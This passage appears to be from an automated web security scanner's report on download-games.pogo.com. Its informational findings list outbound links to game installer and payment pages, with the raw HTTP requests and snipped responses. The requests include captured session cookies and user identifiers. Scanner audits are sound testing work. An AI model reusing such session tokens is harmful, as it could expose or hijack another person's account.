http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14ma_bj3&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14ma_bj3&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14ma_bj3&origin=pcat_fg_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14ma_bj3&origin=pgame_dl_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_twist-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled_twist-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_twist-setup.exe?RefId=14ma_bj3&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled_twist-setup.exe
http://start.pogo.iplay.com/GamesBar/faq.aspx
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110212733&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115635853&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=14ma_bj3&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /deluxe.aspx?code=11964850&refid=14ma_bj3&pageSection=free_home_marketing_alley HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 46889
Cache-Control: private, max-age=3656
Date: Sun, 09 Jan 2011 02:07:55 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
<td rowspan="2">

               <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14ma_bj3&origin=pcat_fg_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" target="_self" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 6:11:01 PM')"><img src="/images/games/Bejeweled3/Bejeweled3293x167.jpg" alt="" width="293" height="167" border="0">
...[SNIP]...
<td>

           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14ma_bj3&origin=pgame_dl_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="return false;" style="display:inline-block;">
           <table cellpadding="0" cellspacing="0" class="btnTable" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 6:11:01 PM'); window.location='http://gamecenter.cd
...[SNIP]...
<br />
           <a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=14ma_bj3&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=" style="display:inline-block;" >
        <table cellpadding="0" cellspacing="0" class="btnTable" onclick="this.parentElement.click();" >
...[SNIP]...
ed for Pogo... is optional for all 60 minute trials. ..Special promotions and additional trial times will require installation of GamesBar... enhanced for Pogo...... For more information, please click <a href=http://start.pogo.iplay.com/GamesBar/faq.aspx target="_blank">here</a>
...[SNIP]...
<td>

           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14ma_bj3&origin=pgame_dl_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 6:11:01 PM')">
               <img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;">
...[SNIP]...
</a>
           <a class="txt11b" href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14ma_bj3&origin=pgame_dl_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 6:11:01 PM')">
               Try Free
           </a>

         

           <a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=14ma_bj3&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=">
           <img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right:4px;margin-top:-2px;">
...[SNIP]...
</a>
           <a class="txt11b" href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=14ma_bj3&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=">
               Buy
           </a>
...[SNIP]...
<td valign="top">

                                           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14ma_bj3&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled-setup.exe" onclick="omnitureLogDownload('110212733','oberonpogostd','bejeweled','puzzle','1/8/2011 6:11:01 PM')"><img src="/images/games/bejeweled/bejeweled81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="_width:80;padding-right:5px"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled-setup.exe" onclick="omnitureLogDownload('110212733','oberonpogostd','bejeweled','puzzle','1/8/2011 6:11:01 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled-setup.exe" onclick="omnitureLogDownload('110212733','oberonpogostd','bejeweled','puzzle','1/8/2011 6:11:01 PM')">Try Free</a>
...[SNIP]...
<td nowrap><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110212733&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110212733&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top">

                                           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14ma_bj3&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 6:11:01 PM')"><img src="/images/games/bejeweled2/bejeweled2_81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="_width:80;padding-right:5px"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 6:11:01 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 6:11:01 PM')">Try Free</a>
...[SNIP]...
<td nowrap><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top">

                                           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_twist-setup.exe?RefId=14ma_bj3&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled_twist-setup.exe" onclick="omnitureLogDownload('115635853','oberonpogostd','Bejeweled Twist','puzzle','1/8/2011 6:11:01 PM')"><img src="/images/games/bejeweled_twist/bejeweled_twist81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="_width:80;padding-right:5px"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_twist-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled_twist-setup.exe" onclick="omnitureLogDownload('115635853','oberonpogostd','Bejeweled Twist','puzzle','1/8/2011 6:11:01 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_twist-setup.exe?RefId=14ma_bj3&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled_twist-setup.exe" onclick="omnitureLogDownload('115635853','oberonpogostd','Bejeweled Twist','puzzle','1/8/2011 6:11:01 PM')">Try Free</a>
...[SNIP]...
<td nowrap><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115635853&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115635853&channel=110184400&RefID=14ma_bj3&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...

16.22. http://download-games.pogo.com/deluxe.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/deluxe.aspx?code=119761357&RefID=pogofree010711

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=pogofree010711&origin=pcat_fg_img&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=pogofree010711&origin=pgame_dl_img&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe
http://start.pogo.iplay.com/GamesBar/faq.aspx
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=pogofree010711&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /deluxe.aspx?code=119761357&RefID=pogofree010711 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 38549
Cache-Control: private, max-age=6842
Date: Sun, 09 Jan 2011 02:08:01 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
<td rowspan="2">

               <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=pogofree010711&origin=pcat_fg_img&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" target="_self" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 7:01:06 PM')"><img src="/images/games/CakeManiaToTheMax/CakeManiaToTheMax293x167.jpg" alt="" width="293" height="167" border="0">
...[SNIP]...
<td>

           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=pogofree010711&origin=pgame_dl_img&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="return false;" style="display:inline-block;">
           <table cellpadding="0" cellspacing="0" class="btnTable" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 7:01:06 PM'); window.location='http://
...[SNIP]...
<br />
           <a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=pogofree010711&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=" style="display:inline-block;" >
        <table cellpadding="0" cellspacing="0" class="btnTable" onclick="this.parentElement.click();" >
...[SNIP]...
ed for Pogo... is optional for all 60 minute trials. ..Special promotions and additional trial times will require installation of GamesBar... enhanced for Pogo...... For more information, please click <a href=http://start.pogo.iplay.com/GamesBar/faq.aspx target="_blank">here</a>
...[SNIP]...
<td>

           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=pogofree010711&origin=pgame_dl_img&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 7:01:06 PM')">
               <img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;">
...[SNIP]...
</a>
           <a class="txt11b" href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=pogofree010711&origin=pgame_dl_img&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 7:01:06 PM')">
               Try Free
           </a>

         

           <a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=pogofree010711&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=">
           <img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right:4px;margin-top:-2px;">
...[SNIP]...
</a>
           <a class="txt11b" href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=pogofree010711&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=">
               Buy
           </a>
...[SNIP]...

16.23. http://download-games.pogo.com/deluxe.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/deluxe.aspx?code=11964850&refid=14hero_bj3b&intcmp=14hero_bj3b&pageSection=free_home_spotlight

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14hero_bj3b&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14hero_bj3b&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14hero_bj3b&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14hero_bj3b&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14hero_bj3b&origin=pcat_fg_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14hero_bj3b&origin=pgame_dl_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_twist-setup.exe?RefId=14hero_bj3b&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled_twist-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_twist-setup.exe?RefId=14hero_bj3b&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled_twist-setup.exe
http://start.pogo.iplay.com/GamesBar/faq.aspx
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110212733&channel=110184400&RefID=14hero_bj3b&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=14hero_bj3b&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=115635853&channel=110184400&RefID=14hero_bj3b&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=14hero_bj3b&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /deluxe.aspx?code=11964850&refid=14hero_bj3b&intcmp=14hero_bj3b&pageSection=free_home_spotlight HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 47141
Cache-Control: private, max-age=2450
Date: Sun, 09 Jan 2011 02:07:55 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
<td rowspan="2">

               <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14hero_bj3b&origin=pcat_fg_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" target="_self" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 5:48:52 PM')"><img src="/images/games/Bejeweled3/Bejeweled3293x167.jpg" alt="" width="293" height="167" border="0">
...[SNIP]...
<td>

           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14hero_bj3b&origin=pgame_dl_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="return false;" style="display:inline-block;">
           <table cellpadding="0" cellspacing="0" class="btnTable" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 5:48:52 PM'); window.location='http://gamecenter.cd
...[SNIP]...
<br />
           <a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=14hero_bj3b&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=" style="display:inline-block;" >
        <table cellpadding="0" cellspacing="0" class="btnTable" onclick="this.parentElement.click();" >
...[SNIP]...
ed for Pogo... is optional for all 60 minute trials. ..Special promotions and additional trial times will require installation of GamesBar... enhanced for Pogo...... For more information, please click <a href=http://start.pogo.iplay.com/GamesBar/faq.aspx target="_blank">here</a>
...[SNIP]...
<td>

           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14hero_bj3b&origin=pgame_dl_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 5:48:52 PM')">
               <img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;">
...[SNIP]...
</a>
           <a class="txt11b" href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_3_89819902-setup.exe?RefId=14hero_bj3b&origin=pgame_dl_img&genre=Puzzle&ln=en&ext=bejeweled_3_89819902-setup.exe" onclick="omnitureLogDownload('11964850','oberonpogostd','Bejeweled 3','puzzle','1/8/2011 5:48:52 PM')">
               Try Free
           </a>

         

           <a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=14hero_bj3b&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=">
           <img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right:4px;margin-top:-2px;">
...[SNIP]...
</a>
           <a class="txt11b" href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=11964850&channel=110184400&RefID=14hero_bj3b&orign=temp_origin&ln=en&BillingCountry=US&lc=en&gameCodeDate=">
               Buy
           </a>
...[SNIP]...
<td valign="top">

                                           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14hero_bj3b&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled-setup.exe" onclick="omnitureLogDownload('110212733','oberonpogostd','bejeweled','puzzle','1/8/2011 5:48:52 PM')"><img src="/images/games/bejeweled/bejeweled81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="_width:80;padding-right:5px"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14hero_bj3b&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled-setup.exe" onclick="omnitureLogDownload('110212733','oberonpogostd','bejeweled','puzzle','1/8/2011 5:48:52 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled-setup.exe?RefId=14hero_bj3b&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled-setup.exe" onclick="omnitureLogDownload('110212733','oberonpogostd','bejeweled','puzzle','1/8/2011 5:48:52 PM')">Try Free</a>
...[SNIP]...
<td nowrap><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110212733&channel=110184400&RefID=14hero_bj3b&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110212733&channel=110184400&RefID=14hero_bj3b&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top">

                                           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14hero_bj3b&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 5:48:52 PM')"><img src="/images/games/bejeweled2/bejeweled2_81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td nowrap style="_width:80;padding-right:5px"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14hero_bj3b&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 5:48:52 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled2-setup.exe?RefId=14hero_bj3b&origin=pdelux_related_icon&genre=Puzzle&ln=en&ext=bejeweled2-setup.exe" onclick="omnitureLogDownload('110272767','oberonpogostd','bejeweled2','puzzle','1/8/2011 5:48:52 PM')">Try Free</a>
...[SNIP]...
<td nowrap><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=14hero_bj3b&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0" align="middle" style="margin-right: 4px; margin-top: -2px;"></a><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=110272767&channel=110184400&RefID=14hero_bj3b&orign=pdelux_related_icon&ln=en&BillingCountry=US&lc=en&gameCodeDate=">Buy</a>
...[SNIP]...
<td valign="top">

                                           <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/bejeweled_twist-setup.exe?RefId=14hero_bj3b&origin=pindex_mp_img&genre=Puzzle&ln=en&ext=bejeweled_twist-setup.exe" onclick="omnitureLogDownload('115635853','oberonpogostd','Bejeweled Twist','puzzle','1/8/2011 5:48:52 PM')"><img src="/images/games/bejeweled_twist/bejeweled_twist81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
